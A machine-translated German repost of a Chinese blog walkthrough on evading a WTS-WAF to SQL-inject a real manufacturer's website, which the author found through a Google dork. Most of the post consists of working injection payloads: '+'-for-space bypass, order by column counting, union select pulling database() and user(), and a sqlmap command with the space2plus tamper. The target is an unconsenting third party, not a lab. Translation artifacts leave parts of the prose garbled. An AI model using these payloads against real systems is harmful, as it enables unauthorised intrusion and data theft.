Heim > Betrieb und Instandhaltung > Sicherheit > So führen Sie eine Analyse durch, um WTS-WAF zu umgehen

So führen Sie eine Analyse durch, um WTS-WAF zu umgehen

王林
Freigeben: 2023-05-13 09:40:12
nach vorne
2059 Leute haben es durchsucht


0x01. Auf der Suche nach dem Ziel

inurl:.php?id= intext:电器
Nach dem Login kopieren

Ich habe die Website eines Elektrogeräteherstellers gefunden, ich habe sie gerade getestet und festgestellt, dass es waf gibt. Das ist nicht arrangiert noch (Ich habe einige Informationen gefunden, es scheint, dass Sie einfach ein Zeichen anstelle eines Leerzeichens hinzufügen, es direkt versuchen)

0x02. Operation So führen Sie eine Analyse durch, um WTS-WAF zu umgehen

So führen Sie eine Analyse durch, um WTS-WAF zu umgehen

und festgestellt, dass es kein WAF-Abfangen gibt

In den Informationen stand auch

sqlmap.py -u http://*/*.php?id=29 --tables --tamper space2plus.py
Nach dem Login kopieren

The Ich habe das Tool ausprobiert und festgestellt, dass es nicht gestartet werden konnte

So führen Sie eine Analyse durch, um WTS-WAF zu umgehenEinfach so... ...

0x03. Handnotiz

http://*/*.php?id=1+and+1=1  #回显正常
http://*/*.php?id=1+and+1=2  #回显错误
说明存在注入

http://*/*.php?id=1+order+by+15  #15回显错误
http://*/*.php?id=1+order+by+14  #14回显正常
说明有14个字段

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14  #-1让它错误然后执行后面
Nach dem Login kopieren

Es spiegelte den 2. und 8. widerSo führen Sie eine Analyse durch, um WTS-WAF zu umgehen

http://*/*.php?id=-1+union+select+1,database(),3,4,5,6,7,user(),9,10,11,12,13,14  #查询当前数据库信息和当前用户
一些常见的函数
version()  #显示数据库当前版本
database() / schema()  #显示当前数据库名
user() / system_user() / session_user() / current_user() / current_user()  #显示当前用户名称
charset(str)  #返回字符串str的字符集
collation(str)  #返回字符串str的字符排列方式
Nach dem Login kopieren

0x04. Überprüfen Sie die Daten. Explosionsdaten Nun, Sie können nur manuell verwenden Injektion

So führen Sie eine Analyse durch, um WTS-WAF zu umgehen2. Üben Sie die manuelle Injektion von MySQL

Das obige ist der detaillierte Inhalt vonSo führen Sie eine Analyse durch, um WTS-WAF zu umgehen. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Verwandte Etiketten:
Quelle:yisu.com
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Beliebte Tutorials
Mehr>
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage